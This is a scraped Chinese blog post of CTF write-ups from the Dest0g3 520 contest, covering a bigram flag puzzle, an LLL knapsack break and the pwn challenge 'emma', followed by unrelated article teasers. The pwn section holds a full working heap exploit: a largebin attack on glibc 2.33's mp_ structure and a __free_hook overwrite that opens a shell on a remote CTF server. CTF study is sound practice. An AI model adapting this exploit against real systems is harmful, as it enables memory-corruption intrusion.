石氏是时试
石氏是时试

[Dest0g3 520迎新赛] 不会的部分 The correct flag,emma,Bag

 终于在赛完N天后搜到一些不会的题--> 问谛居

目录

AI The correct flag

pwn emma

crypto Bag

AI The correct flag

这个是脑子没想到,解出来是两个字母一级的N多个对,看了才知道这个题是找第1个字母后第2个字母的出现数量最从的组合,比如第1个字母是D第2个字母e出现15次,是出现次数最高的。所以用这个求出所有的组合64个,将这些组合按顶针的方法连起来就行了De-es-st-t0-0g-g3-3{.....

#统计第1个字母后第2个字母的个数

data = open('a.txt', 'r').read().split(' ')
tab = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789{}'
da = []
for i in range(64):
    da.append([0]*64)
#print(da)
for a in data:
    da[tab.index(a[0])][tab.index(a[1])]+=1
for i in range(64):
    l1 = ''
    l2 = ''
    for j in range(64):
        l1 +='  ' + tab[j]
        l2 +=f"% 3d" % da[i][j]
    print(tab[i], ':')
    print(l1)
    print(l2)
    
#print(da)
db = []
for i in range(64):
    v = 0
    t = 0
    for j in range(64):
        if da[i][j] > v:
            v,t = da[i][j],j
    db.append(tab[i]+tab[t])

print(' '.join(db))  

#AB BG Ce De EI FA GF HD Il JE KE LF MR NW OI PP QK RE Sd TW UX VB Wq XI YH Zq aA bG cO dI es fC g3 hP in jV kB l1 mH nP oD pP qS rD st t0 uI vB wH xB yP zO 0g 1} 29 3{ 4D 5Y 6Q 7N 87 98 {2 }D
#De es st ...
#Dest0

flag = 'D'
while flag[-1] != '}':
    for a in db:
        if a[0] == flag[-1]:
            flag += a[1]
            break
print(flag)

pwn emma

这个一开始发现只能建大块释放后进入unsort就不知道怎么弄了,看了才知道mp_ 这个结构在libc里存tcache的信息,在+72的位置保存的是堆的基地址,+80的位置是tcache的最大块尺寸,如果大于这个尺寸就会放到unsort。

所以思路就是通过largebin attack把一个指针放到+80的位置,再建块就会因为这个数太大而放入tcache从而进行tcache attack

第1步建个大块释放得到unsort指针,由于这个指针末尾字节是0,需要再建块利用残留获得

第2步largebin attack先建块释放,再建更大的让它进入largebin然后通过UAF将下一块的指针改为mp_+80(largebin有4个指针,最后一个是)

第3步再释放一个块再建更大的,让第1个largebin与第2个成链的时候会将指针写到mp_+80位置这时tcache的最大size被改大

第4步建块释放得到堆地址,改为__free_hook再建块写system再释放带/bin/sh的块。这里由于2.33对堆地址进行了加密,加密方式很简单是当前块地址异或指针。所以只需要让两个chunk的后12位相同直接用第1个指针(值为0)当作第2个释放的key就行(如果不在同一个XXX减1作个调整也一样)

from pwn import *

#patchelf --set-interpreter /home/shi/ctf/520/libc6-2.33/lib/x86_64-linux-gnu/ld-2.33.so  pwn
#patchelf --add-needed /home/shi/ctf/520/libc6-2.33/lib/x86_64-linux-gnu/libc-2.33.so pwn

local = 0
if local == 1:
    p = process('./pwn')
else:
    p = remote('node4.buuoj.cn', 27686)
    
context(arch='amd64')

elf = ELF('./pwn')
libc_elf = ELF('/home/shi/ctf/520/libc6-2.33/lib/x86_64-linux-gnu/libc-2.33.so')

menu = b">>\n"
def add(idx, size, msg=b'/bin/sh\x00'):
    p.sendlineafter(menu, b'1')
    p.sendlineafter(b"Index: \n", str(idx).encode())
    p.sendlineafter(b"Size: \n" ,str(size).encode())
    p.sendafter(b"Content\n", msg)

def free(idx):
    p.sendlineafter(menu, b'4')
    p.sendlineafter(b"Index: \n", str(idx).encode())

def show(idx):
    p.sendlineafter(menu, b'3')
    p.sendlineafter(b"Index: \n", str(idx).encode())

def edit(idx, msg):
    p.sendlineafter(menu, b'2')
    p.sendlineafter(b"Index: \n", str(idx).encode())
    p.sendafter(b"Content\n", msg)

context.log_level='debug'

add(0, 0x450)
add(1, 0x420) 
free(0)

add(2, 0x440, b'A')
show(0)

libc_base = u64(p.recv(6).ljust(8, b'\x00')) - ord('A') - 0x400 - 0x60 -0x10 - libc_elf.sym['__malloc_hook']
libc_elf.address = libc_base
mp_80 = libc_base + 0x1e02b0   #find heap_base in libc : libc+0x1e02c8 = sbrk_base->head_base 在mp_+72的位置有堆的基地址,需要改+80的位置为一个大数(堆地址代替),使堆块值不超过tcache最大值,从而进入tcache进行tcacheattack
print('libc:', hex(libc_base))
print('mp_80', hex(mp_80))

add(0, 0x440)
add(3, 0x420)
free(2)
add(4, 0x600)
free(0)

edit(2, p64(0)*3 + p64(mp_80))


add(5, 0x800)  #large_bin attack tcache_bins = 0x55...  (max_size_tcache)

add(6, 0x500)  #chunk6 >>12 == chunk7>>12
add(7, 0x500)


free(7)
show(7)
key = u64(p.recvline()[:-1].ljust(8, b'\x00'))   #key
print('key:', hex(key))

free(6)
edit(6, p64(libc_elf.sym['__free_hook'] ^ key))
add(8, 0x500)
add(9, 0x500, p64(libc_elf.sym['system']))
free(8)

p.sendline(b'cat /flag')
p.interactive()

#Dest0g3{3801ee2a-6686-4428-9d64-0f812793cc14}

crypto Bag

这个突然感觉没文化真可怕。

一开始想到的就是递归,可一看数字286层,这个不可能完成,即使减掉可以预测已知的部分也不行。

第二个想法是01背包问题,不过背包问题需要一个巨大的数组V这第大,这里的V是c也不可能实现,后来想用分段的方法虚拟一个数组。终于静下心来写出来了,但一运行也不行,因为背包问题会保存所以可能的状态,这些状态是c(n,0)+c(n,1)+...+c(n,n)种状态,这也是不可能实现的

昨天看到人家写的WP,感觉没文化啊。

这应该是一个线性代数的一个例题:用基格约减法求最短正交基

先建一个(n+1)*(n+1)的矩阵,对角线为1,末列为公钥Pk,末行末列为-c 

然后用基格约简法求最短正交基  A.LLL() 然后输出就行了

nbit = len(Pk)

encoded = 1475864207352419823225329328555476398971654057144688193866218781853021651529290611526242518
print("start")
# 建一个(n+1)*(n+1)的矩阵,对角线值为1,末列为公钥,末行末列为-c 求LLL 
# create a large matrix of 0's (dimensions are public key length +1)
A = Matrix(ZZ, nbit + 1, nbit + 1)
# fill in the identity matrix
for i in range(nbit):
    A[i, i] = 1
# replace the bottom row with your public key
for i in range(nbit):
    A[i, nbit] = Pk[i]
# last element is the encoded message
A[nbit, nbit] = -int(encoded)

res = A.LLL()
for i in range(0, nbit + 1):
    # print solution
    M = res.row(i).list()
    flag = True
    for m in M:
        if m != 0 and m != 1:
            flag = False
            break
    if flag:
        print(i, M)
        M = ''.join(str(j) for j in M)
        # remove the last bit
        M = M[:-1]             #矩阵是n+1行,结果是n+1个值,最后一个去掉
        M = hex(int(M, 2))[2:]
        print(bytes.fromhex(M))
#5090ea29-8cb6-4ad8-ab43-1e6f65cc8eeb
#Dest0g3{5090ea29-8cb6-4ad8-ab43-1e6f65cc8eeb}

用sage运行n0秒后出结果。仅一句啊。

你可能感兴趣的:(CTF,crypto,CTF,pwn,CTF,misc,Dest0g3)

  • mysql复习 立夏的李子 mysql数据库database
    mysqlselect语法selectfromjoinwheregroupbyhavingorderbylimit联合查询innerjoin()leftjoin(以左表为基准,匹配右表,不匹配的返回左表,右表以null值填充)rightjoind··(去除列重复的数据)索引类型主键索引(PrimaryKey)唯一索引(Unique)常规索引(Index)全文索引(FullText)索引准则索引不是
  • 一分钟了解什么是SCI影响因子 ? 学术投稿人
    影响因子详解期刊的影响因子(ImpactFactor),指的是该刊前二年发表的文献在当前年的平均被引用次数。刊物的影响因子越高,也即其刊载的文献被引用率越高,一方面说明这些文献报道的研究成果影响力大,另一方面也反映该刊物的学术水平高。由美国科学情报研究所(ISI,InstituteforScientificInformation)创始人尤金.加菲得(Dr.E.Garfield)在1960年代创立,
  • window显示驱动开发—Direct3D 11 视频设备驱动程序接口 (DDI) 程序员王马 windows图形显示驱动开发音视频
    这些设备驱动程序接口(DDI)是新的或针对Windows8更新的:CalcPrivateCryptoSessionSizeCalcPrivateAuthenticatedChannelSizeCalcPrivateVideoDecoderOutputViewSizeCalcPrivateVideoDecoderSizeCalcPrivateVideoProcessorEnumSizeCalcPri
  • Wireshark攻防实战
    一、基础环境配置安全捕获环境搭建#创建隔离环境并抓包sudoiplinkseteth0promisconsudotcpdump-ieth0-s0-w/mnt/isolated/evidence.pcap高危协议快速过滤tcp.portin{135,139,445,3389}||udp.portin{53,123,161,500,4500}关键字段标记技巧右键IP→ApplyasColumn设置TT
  • CTF-Web学习笔记:SQL注入篇 编程到天明 CTFsql网络安全
    目录引言一、SQL注入的基础概念1.什么是SQL注入?2.SQL注入的成因二、CTF中常见的SQL注入类型1.按参数类型分类2.按注入方式分类3.其他进阶类型三、CTF实战技巧:从找注入点到拿Flag1.如何判断是否存在注入?2.快速确定数据库类型3.常用工具辅助4.绕过WAF(Web应用防火墙)四、CTF题目示例:一道报错注入实战题目背景解题步骤五、总结与提升引言在CTF(CaptureTheF
  • 英语日积月累2023-06-06 抽刀断水2
    fuzzyfuzzyfuzzy模糊这电影声带有些地方模糊不清。Thesoundtrackisfuzzyinplaces.respectfullyrespectfullyrespectfully恭敬地“嗯,当然,先生。”田鼠恭恭敬敬地回答。"Why,certainly,sir,"repliedthefield-mouserespectfully.puzzlepuzzlepuzzle使困惑;n.难题,
  • 【科研绘图系列】R语言绘制边际云雨图散点图 生信学习者1 SCI科研绘图系列(2024版)r语言数据可视化
    文章目录介绍加载R包数据下载导入数据数据预处理画图系统信息参考介绍【科研绘图系列】R语言绘制边际云雨图散点图加载R包library(tidyverse)library(ggplot2)library(ggpubr)library(ggpmisc)library(gghalves)library(aplot
  • equals和hashCode的关系,equals相等,hashCode就必须要相等吗? 架构师springboot
    我们经常听见hashCode相等,那么equals可以不相等,但是equals相等,那么hashCode就一定相等这2个定理,没有看源码的同学就会认为jdk保证了equals相等,那么hashCode就一定相等,但是事实真的是这样吗?答案是否定的,equals相等,hashCode也是可以不相等的,看下面的那个例子:packagecontroller.abstractfactory;importj
  • PostgreSQL LIKE 子句 嘀嗒运维
    在PostgreSQL数据库中,我们如果要获取包含某些字符的数据,可以使用LIKE子句。在LIKE子句中,通常与通配符结合使用,通配符表示任意字符,在PostgreSQL中,主要有以下两种通配符:百分号%下划线_如果没有使用以上两种通配符,LIKE子句和等号=得到的结果是一样的。语法以下是使用LIKE子句搭配百分号%和下划线_从数据库中获取数据的通用语法:SELECTFROMtable_nameW
  • react class和function 如何模拟vue中的 双向绑定 监听 computed的方式
    在React中,类组件和函数组件的写法有所不同。你提到的「双向绑定」、「监听」和「computed(计算属性)」这几个概念,原本来源于Vue,但在React中我们也可以通过特定方式实现类似功能。下面我将分别介绍:1.类组件中的双向绑定在类组件中,要实现双向绑定(如表单输入),我们通常使用state和onChange:importReactfrom'react';classMyFormextends
  • Cryptonite? Bitcoin’s bubble 邮差在行动
    https://espresso.economist.com/e6482081cc9fd2748f7457d6ab23506d--Dec20th2018Cryptonite?Bitcoin’sbubbleBitcoin比特币;虚拟货币比特币bubble泡沫;气泡AyearagothepriceofbitcoinonCoinMarketCap,acryptocurrencyexchange,near
  • CTF入门教程(非常详细)从零基础入门到竞赛,看这一篇就够了! 网络安全宇哥 web安全安全网络网络安全安全架构
    一、CTF简介CTF(CaptureTheFlag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。发展至今,已经成为全球范围网络安全圈流行的竞赛形式,2013年全球举办了超过五十场国际性CTF赛事。而DEFCON作为CTF赛制的发源地,DEFCONCT
  • pyvisa.errors.VisaIOError: VI_ERROR_SYSTEM_ERROR (-1073807360): Unknown system error (miscellaneous) 甜果酱C bugbug嵌入式硬件
    今天在调试通过pyvisa发送上电、下电的指令后,不知道发了什么命令,导致正常命令发送出去要么没有反应,要么报错pyvisa.errors.VisaIOError:VI_ERROR_SYSTEM_ERROR(-1073807360):Unknownsystemerror(miscellaneous)。尝试了重启程控电源、重启PC、重新安装NT-VISA、程控电源恢复出厂设置都没有得到解决,最后实在
  • 学习014-03-01-03 Miscellaneous Customizations of the Audit Trail System (EF Core)(审计跟踪系统(EF Core)的其他自定 汤姆•猫 XAF学习.netc#DevSecurityAudit
    MiscellaneousCustomizationsoftheAuditTrailSystem(EFCore)(审计跟踪系统(EFCore)的其他自定义设置)TrackChangesinObjectsofSpecificTypes(跟踪特定类型对象的变化)TheAuditTrailOptions.AuditedTypePolicypropertyallowsyoutoauditchangeson
  • 比特币简介 AIMercs BTCBTC
    whatisbitcoin?cryptocurrency加密货币,虚拟货币,不可伪造BlockChain公开、不可篡改、持续更新的账单Wallet存储加密货币的钱包,类似银行Publicandprivatekeys公私钥,公钥为地址;私钥即密码Decentralization去中心化,将权利和控制分散Mining挖矿,计算量POWhowdosebitcoinwork?transactioncrea
  • 九联UNT413AS_晶晨S905L3S芯片_2+8G_安卓9.0_线刷固件包
    九联UNT413AS_晶晨S905L3S芯片_2+8G_安卓9.0_线刷固件包理论上:九联UNT413AS和九联UNT403AS是可以通刷的,往期九联UNT403AS帖子:https://blog.csdn.net/fatiaozhang9527/article/details/145726774?ops_request_misc=%257B%2522request%255Fid%2522%253
  • Python密码学库之pycryptodome使用详解 Rocky006 python开发语言
    概要pycryptodome是一个功能强大的Python密码学库,是pycrypto库的现代化替代品。它提供了全面的密码学功能,包括对称加密、非对称加密、哈希算法、数字签名等。该库具有良好的性能、安全性和易用性,广泛应用于网络安全、数据保护、身份验证等领域。安装1、安装命令pipinstallpycryptodome2、验证安装from Crypto.Cipher import AESfrom C
  • no version information available的解决办法 柳鲲鹏
    最近在编译时,发现一个错误:/usr/lib/libcrypto.so.1.0.0:noversioninformationavailable(requiredby/usr/sbin上网搜索了一番,没找到解决办法。到/usr/lib下ll一下,有两个文件:libcrypto.solibcrypto.so.1.0.0正常。怎么大小一样?后者应该是个link才对。怎么办?直接把后者删除。然后错误消失。
  • SQL实战宝典:常用语句全解析
    SQL常用语句分类示例数据查询(SELECT)查询所有列:SELECT*FROMemployees;查询特定列并排序:SELECTfirst_name,last_nameFROMemployeesORDERBYhire_dateDESC;条件筛选(WHERE):SELECTproduct_name,priceFROMproductsWHEREprice>100ANDcategory='Electr
  • Spring Boot + AOP + Jasypt,3 步实现敏感数据脱敏
    在企业级应用开发中,用户敏感信息(如手机号、邮箱、密码等)的保护至关重要。SpringBoot生态提供了Jasypt加密框架与AOP编程模型的组合方案,可在不侵入业务逻辑的前提下实现数据全生命周期的脱敏管理。加密工具类importorg.slf4j.Logger;importorg.slf4j.LoggerFactory;importsun.misc.BASE64Decoder;importsun
  • 零侵入加解密方案:Spring Boot + Jasypt + AOP实现敏感数据自动保护
    1.添加依赖在pom.xml中添加Jasypt和AOP依赖:com.github.ulisesbocchiojasypt-spring-boot-starter3.0.5org.springframework.bootspring-boot-starter-aop2.配置Jasypt在application.yml中配置加密密钥和算法:jasypt:encryptor:password:your_
  • 非对称加密:原理、算法与应用全解析 蚂蚁没问题s 算法学习#加密算法加密非对称加密
    一、基本原理非对称加密(AsymmetricCryptography)通过数学函数生成一对密钥(公钥与私钥),实现加密与解密的分离。其核心原理包含以下环节:密钥生成用户生成一对密钥:公钥(可公开)和私钥(需保密)。公钥用于加密或验证签名,私钥用于解密或生成签名。加密与解密加密:发送方使用接收方的公钥加密信息,生成密文。解密:接收方使用私钥解密,恢复明文。由于私钥唯一,仅接收方可解密。数字签名签名生
  • 前端开发命名规范 十月不到底 javascript前端
    前言优秀的代码往往是最通俗易懂的代码,在于它的易于维护。在开发过程中,变量/方法优秀的命名往往有助于理解该变量/方法的用途,起到命名即注释的作用。而糟糕的命名往往会让人摸不着头脑。为了提高代码的可维护性,我们需要更优雅的命名方式。一.常见命名种类目前收集到的常见的命名方式主要有以下4种:驼峰命名法(camelCase)首字母小写,从第二个单词开始首字母大写,例如:myProjectFolder帕斯
  • 前后端AES加解密,java使用CipherOutputStream加密输出时,前端分段解密方案 running17 前端javascript安全
    如果java输出的数据是使用CipherOutputStream按1024(假设)个字节加密输出的,那么如果前端也必须按照1024个字节分段进行解密,不然将会解密失败,以下是前端的具体解密逻辑:前端依赖:详细逻辑:convertWordArrayToUint8Array为将CryptoJs解密后的wordArray对象转化为保存文件可用的Uint8Array的字节流对象,下方会使用到functio
  • Python crypto包功能介绍 追逐此刻 pythonpython开发语言
    在Python中,crypto相关的包通常用于加密、解密、哈希和其他密码学操作。以下是几个常见的与crypto相关的Python包及其作用:1.什么是“加密”?加密就像把一封信放进一个带锁的盒子里,只有有钥匙的人才能打开看。在计算机里,加密的作用是:保护隐私:比如你的密码、银行卡号不能让别人看到。防止篡改:比如下载的文件不能被坏人偷偷修改。安全通信:比如微信聊天内容不会被黑客偷看。Python的c
  • Python 程序无法找到 Oracle 的 64 位客户端库 (libclntsh.so) 期待着2013 python
    数据库错误:DPI-1047:Cannotlocatea64-bitOracleClientlibrary:"libclntsh.so:cannotopensharedobjectfile:Nosuchfileordirectory".Seehttps://oracle.github.io/odpi/doc/installation.html#linuxforhelp这个错误表明Python程序无
  • SpringIOC源码(三)——getBean及createBean做了什么 天凉好个球儿
    SpringIOC学习(三)getBean()一初始化非懒加载的单例bean二preInstantiateSingletons()1.getMergedLocalBeanDefinition()三doGetBean1.getSingleton(StringbeanName,booleanallowEarlyReference)2.getObjectForBeanInstance()2.1getOb
  • 货币对冲基金的最佳搭档 比特币价值新定位 色韵神调
    CCEX数字货币永续合约交易平台CCEX数字货币交易平台eToro的高级市场分析师MatiGreenspan通过电子邮件向Cryptovest发送了一份分析报告,其中描述了加密货币市场的潜在变化。他表示,较大的基金机构和经济学家必然会将加密货币视为一种潜在的有效金融工具。“许多经济学家和投资组合经理现在看到它的主要优势是使用加密资产作为资金管理的有力工具,”他说。格林斯潘然后向我们指出了一个代表标
  • 用bash分割字符串 六个九十度 linux软件bashlinux
    背景最近负责移植固件升级功能,发现原来的升级脚本将固件的路径名和文件名不做区分,导致脚本必须跟固件在同一路径下才能正确调用,殊为不便。上代码:sudomkdir-p/lib/firmware/F260/sudocp$1/lib/firmware/F260/echoburn$1to$2...sudoechoF260/$1>/sys/class/misc/PCIE_SubFpga1/d_${2}_up
  • php中的hmac,JavaScript通过CryptoJS等效实现php中hash_hmac函数加密raw_output配置 好想不取名 php中的hmac
    在一个项目中,客户需要从前端签名,加密插件使用的cryptoJS,使用与后端一样的签名流程(HmacSHA1后Base64.encode)发现并不能通过签名认证,签名校验方后端php代码中使用hash_hmac函数,先来看一下则会个函数的官网说明:说明hash_hmac(string$algo,string$data,string$key[,bool$raw_output=FALSE]):stri
  • springmvc 下 freemarker页面枚举的遍历输出 杨白白 enumfreemarker
    spring mvc freemarker 中遍历枚举 1枚举类型有一个本地方法叫values(),这个方法可以直接返回枚举数组。所以可以利用这个遍历。 enum public enum BooleanEnum { TRUE(Boolean.TRUE, "是"), FALSE(Boolean.FALSE, "否");
  • 实习简要总结 byalias 工作
    来白虹不知不觉中已经一个多月了,因为项目还在需求分析及项目架构阶段,自己在这段 时间都是在学习相关技术知识,现在对这段时间的工作及学习情况做一个总结: (1)工作技能方面 大体分为两个阶段,Java Web 基础阶段和Java EE阶段 1)Java Web阶段 在这个阶段,自己主要着重学习了 JSP, Servlet, JDBC, MySQL,这些知识的核心点都过 了一遍,也
  • Quartz——DateIntervalTrigger触发器 eksliang quartz
    转载请出自出处:http://eksliang.iteye.com/blog/2208559 一.概述 simpleTrigger 内部实现机制是通过计算间隔时间来计算下次的执行时间,这就导致他有不适合调度的定时任务。例如我们想每天的 1:00AM 执行任务,如果使用 SimpleTrigger,间隔时间就是一天。注意这里就会有一个问题,即当有 misfired 的任务并且恢复执行时,该执行时间
  • Unix快捷键 18289753290 unixUnix;快捷键;
    复制,删除,粘贴: dd:删除光标所在的行                             &nbs
  • 获取Android设备屏幕的相关参数 酷的飞上天空 android
    包含屏幕的分辨率  以及 屏幕宽度的最大dp 高度最大dp   TextView text = (TextView)findViewById(R.id.text); DisplayMetrics dm = new DisplayMetrics(); text.append("getResources().ge
  • 要做物联网?先保护好你的数据 蓝儿唯美 数据
    根据Beecham Research的说法,那些在行业中希望利用物联网的关键领域需要提供更好的安全性。 在Beecham的物联网安全威胁图谱上,展示了那些可能产生内外部攻击并且需要通过快速发展的物联网行业加以解决的关键领域。 Beecham Research的技术主管Jon Howes说:“之所以我们目前还没有看到与物联网相关的严重安全事件,是因为目前还没有在大型客户和企业应用中进行部署,也就
  • Java取模(求余)运算 随便小屋 java
            整数之间的取模求余运算很好求,但几乎没有遇到过对负数进行取模求余,直接看下面代码: /** * * @author Logic * */ public class Test { public static void main(String[] args) { // TODO A
  • SQL注入介绍 aijuans sql注入
    二、SQL注入范例 这里我们根据用户登录页面 <form action="" > 用户名:<input type="text" name="username"><br/> 密 码:<input type="password" name="passwor
  • 优雅代码风格 aoyouzi 代码
    总结了几点关于优雅代码风格的描述: 代码简单:不隐藏设计者的意图,抽象干净利落,控制语句直截了当。 接口清晰:类型接口表现力直白,字面表达含义,API 相互呼应以增强可测试性。 依赖项少:依赖关系越少越好,依赖少证明内聚程度高,低耦合利于自动测试,便于重构。 没有重复:重复代码意味着某些概念或想法没有在代码中良好的体现,及时重构消除重复。 战术分层:代码分层清晰,隔离明确,
  • 布尔数组 百合不是茶 java布尔数组
      androi中提到了布尔数组;   布尔数组默认的是false,  并且只会打印false或者是true   布尔数组的例子;  根据字符数组创建布尔数组 char[] c = {'p','u','b','l','i','c'}; //根据字符数组的长度创建布尔数组的个数 boolean[] b = new bool
  • web.xml之welcome-file-list、error-page bijian1013 javaweb.xmlservleterror-page
    welcome-file-list 1.定义: <welcome-file-list> <welcome-file>login.jsp</welcome> </welcome-file-list>  2.作用:用来指定WEB应用首页名称。   error-page1.定义: <error-page&g
  • richfaces 4 fileUpload组件删除上传的文件 sunjing clearRichfaces 4fileupload
     页面代码               <h:form id="fileForm">            <rich:
  • 技术文章备忘 bit1129 技术文章
    Zookeeper http://wenku.baidu.com/view/bab171ffaef8941ea76e05b8.html http://wenku.baidu.com/link?url=8thAIwFTnPh2KL2b0p1V7XSgmF9ZEFgw4V_MkIpA9j8BX2rDQMPgK5l3wcs9oBTxeekOnm5P3BK8c6K2DWynq9nfUCkRlTt9uV
  • org.hibernate.hql.ast.QuerySyntaxException: unexpected token: on near line 1解决方案 白糖_ Hibernate
    文章摘自:http://blog.csdn.net/yangwawa19870921/article/details/7553181   在编写HQL时,可能会出现这种代码: select a.name,b.age from TableA a left join TableB b on a.id=b.id  如果这是HQL,那么这段代码就是错误的,因为HQL不支持
  • sqlserver按照字段内容进行排序 bozch 按照内容排序
    在做项目的时候,遇到了这样的一个需求:           从数据库中取出的数据集,首先要将某个数据或者多个数据按照地段内容放到前面显示,例如:从学生表中取出姓李的放到数据集的前面;          select * fro
  • 编程珠玑-第一章-位图排序 bylijinnan java编程珠玑
    import java.io.BufferedWriter; import java.io.File; import java.io.FileWriter; import java.io.IOException; import java.io.Writer; import java.util.Random; public class BitMapSearch {
  • Java关于==和equals chenbowen00 java
    关于==和equals概念其实很简单,一个是比较内存地址是否相同,一个比较的是值内容是否相同。虽然理解上不难,但是有时存在一些理解误区,如下情况: 1、 String a = "aaa"; a=="aaa"; ==> true 2、 new String("aaa")==new String("aaa
  • [IT与资本]软件行业需对外界投资热情保持警惕 comsci it
          我还是那个看法,软件行业需要增强内生动力,尽量依靠自有资金和营业收入来进行经营,避免在资本市场上经受各种不同类型的风险,为企业自主研发核心技术和产品提供稳定,温和的外部环境...       如果我们在自己尚未掌握核心技术之前,企图依靠上市来筹集资金,然后使劲往某个领域砸钱,然
  • oracle 数据块结构 daizj oracle数据块块结构行目录
    oracle 数据块是数据库存储的最小单位,一般为操作系统块的N倍。其结构为: 块头--〉空行--〉数据,其实际为纵行结构。 块的标准大小由初始化参数DB_BLOCK_SIZE指定。具有标准大小的块称为标准块(Standard Block)。块的大小和标准块的大小不同的块叫非标准块(Nonstandard Block)。同一数据库中,Oracle9i及以上版本支持同一数据库中同时使用标
  • github上一些觉得对自己工作有用的项目收集 dengkane github
    github上一些觉得对自己工作有用的项目收集 技能类 markdown语法中文说明 回到顶部 全文检索 elasticsearch bigdesk elasticsearch管理插件 回到顶部 nosql mapdb 支持亿级别map, list, 支持事务. 可考虑做为缓存使用 C
  • 初二上学期难记单词二 dcj3sjt126com englishword
    dangerous 危险的 panda 熊猫 lion 狮子 elephant 象 monkey 猴子 tiger 老虎 deer 鹿 snake 蛇 rabbit 兔子 duck 鸭 horse 马 forest 森林 fall 跌倒;落下 climb 爬;攀登 finish 完成;结束 cinema 电影院;电影 seafood 海鲜;海产食品 bank 银行
  • 8、mysql外键(FOREIGN KEY)的简单使用 dcj3sjt126com mysql
    一、基本概念 1、MySQL中“键”和“索引”的定义相同,所以外键和主键一样也是索引的一种。不同的是MySQL会自动为所有表的主键进行索引,但是外键字段必须由用户进行明确的索引。用于外键关系的字段必须在所有的参照表中进行明确地索引,InnoDB不能自动地创建索引。 2、外键可以是一对一的,一个表的记录只能与另一个表的一条记录连接,或者是一对多的,一个表的记录与另一个表的多条记录连接。 3、如
  • java循环标签 Foreach shuizhaosi888 标签java循环foreach
    1. 简单的for循环 public static void main(String[] args) { for (int i = 1, y = i + 10; i < 5 && y < 12; i++, y = i * 2) { System.err.println("i=" + i + " y="
  • Spring Security(05)——异常信息本地化 234390216 exceptionSpring Security异常信息本地化
    异常信息本地化          Spring Security支持将展现给终端用户看的异常信息本地化,这些信息包括认证失败、访问被拒绝等。而对于展现给开发者看的异常信息和日志信息(如配置错误)则是不能够进行本地化的,它们是以英文硬编码在Spring Security的代码中的。在Spring-Security-core-x
  • DUBBO架构服务端告警Failed to send message Response javamingtingzhao 架构DUBBO
     废话不多说,警告日志如下,不知道有哪位遇到过,此异常在服务端抛出(服务器启动第一次运行会有这个警告),后续运行没问题,找了好久真心不知道哪里错了。    WARN 2015-07-18 22:31:15,272 com.alibaba.dubbo.remoting.transport.dispatcher.ChannelEventRunnable.run(84)
  • JS中Date对象中几个用法 leeqq JavaScriptDate最后一天
    近来工作中遇到这样的两个需求 1. 给个Date对象,找出该时间所在月的第一天和最后一天 2. 给个Date对象,找出该时间所在周的第一天和最后一天   需求1中的找月第一天很简单,我记得api中有setDate方法可以使用 使用setDate方法前,先看看getDate var date = new Date(); console.log(date); // Sat J
  • MFC中使用ado技术操作数据库 你不认识的休道人 sqlmfc
    1.在stdafx.h中导入ado动态链接库 #import"C:\Program Files\Common Files\System\ado\msado15.dll" no_namespace rename("EOF","end")2.在CTestApp文件的InitInstance()函数中domodal之前写::CoIniti
  • Android Studio加速 rensanning android studio
    Android Studio慢、吃内存!启动时后会立即通过Gradle来sync & build工程。 (1)设置Android Studio a) 禁用插件 File -> Settings...  Plugins 去掉一些没有用的插件。 比如:Git Integration、GitHub、Google Cloud Testing、Google Cloud
  • 各数据库的批量Update操作 tomcat_oracle javaoraclesqlmysqlsqlite
    MyBatis的update元素的用法与insert元素基本相同,因此本篇不打算重复了。本篇仅记录批量update操作的 sql语句,懂得SQL语句,那么MyBatis部分的操作就简单了。   注意:下列批量更新语句都是作为一个事务整体执行,要不全部成功,要不全部回滚。 MSSQL的SQL语句  WITH R AS(   SELECT 'John' as name, 18 as
  • html禁止清除input文本输入缓存 xp9802 input
    多数浏览器默认会缓存input的值,只有使用ctl+F5强制刷新的才可以清除缓存记录。如果不想让浏览器缓存input的值,有2种方法: 方法一: 在不想使用缓存的input中添加 autocomplete="off"; eg: <input type="text" autocomplete="off" name
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他